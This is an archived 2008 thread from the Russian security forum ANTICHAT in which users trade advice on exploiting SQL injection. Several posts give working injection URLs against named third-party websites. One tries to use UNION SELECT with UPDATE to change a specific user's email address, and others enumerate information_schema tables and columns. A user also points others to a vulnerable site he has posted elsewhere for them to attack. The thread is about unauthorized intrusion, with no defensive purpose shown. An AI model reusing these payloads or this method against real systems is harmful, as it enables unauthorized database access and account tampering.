ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.04.2008, 16:34
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Задавал не таку давно вопрос, но не получил ни одного ответа. Попытаю удачу еще раз 
сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать?
кстате через иньекцию команду update можно выполнить?
можно если на то права есть, в разделе sql inj я токо что выложил сайт с норм. правами попробуй его.
Последний раз редактировалось bag; 24.04.2008 в 16:38..
|
|
|
24.04.2008, 16:40
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
bag Прв хватает это root просто хочу знать как сформировать запрос
|
|
|
|
24.04.2008, 17:02
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
В Мускуле кроме селекта нельзя ничего выполнить.
|
|
|
|
24.04.2008, 17:06
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Doom123 ну например update table1 set pole1=12345;
если я прально тя понял...
вобщем синтаксис такой
UPDATE [LOW_PRIORITY] [IGNORE] tbl_name
SET col_name1=expr1 [, col_name2=expr2 ...]
[WHERE where_definition]
[ORDER BY ...]
[LIMIT rows]
|
|
|
|
24.04.2008, 17:14
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
та я знаю sql я спрашиваю как это сделать через иньекцию
я ж не буду писать
www.site.ru/s?a=-1+update+table+set+col=1,2+where+id+like+1/*
Последний раз редактировалось Doom123; 24.04.2008 в 17:20..
|
|
|
|
24.04.2008, 17:34
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
можно попробовать select....+20+and+update...
но не уверен
|
|
|
|
24.04.2008, 17:35
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Doom123, если прав хватает можешь как хочешь писать 
Велемир, сам-то понял что сказал?) |
|
|
|
24.04.2008, 17:43
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
ваще странно, тут права рута
http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32+and+update+us ers+set+email='gg@gg.com'+where+username='jdeagnon '/*
вылетает ошибка. ' - не фильтруется
бывает
Последний раз редактировалось bag; 24.04.2008 в 18:03..
|
|
|
|
24.04.2008, 18:02
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
не придумывайте, если инъекция в select запросе, то в мускуле никакие update и иже с ними не используешь
зы про grant вобще отжиг
__________________
Карфаген должен быть разрушен...
|
|
|
|
24.04.2008, 18:54
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Во, Скиппи за Велю )))))).Теперь как всегда вопрос :
Нашёл скулю(с кем не бывает,по сто за день: )).
Нашёл таблички:
http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,table_name,4+from+information_s chema.tables--
Нашёл колонки:
http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,column_name,4+from+information_ schema.columns--
К Mysql.user закрыт доступ, ибо не руткинс ).
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
А запрос похожий видел такой :
-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
(Бред какой-то имхо) (
Интересует, почему нету последних таблиц tbmember и tblogin(долго парился,перебирая имена).Таблицы с префиксом tbl существуют, но колонки от них не подходят(я не все перебрал).Просто колонка member_id по логике должна быть в tbmember. Что за бред?! (
Последний раз редактировалось Велемир; 24.04.2008 в 18:57..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
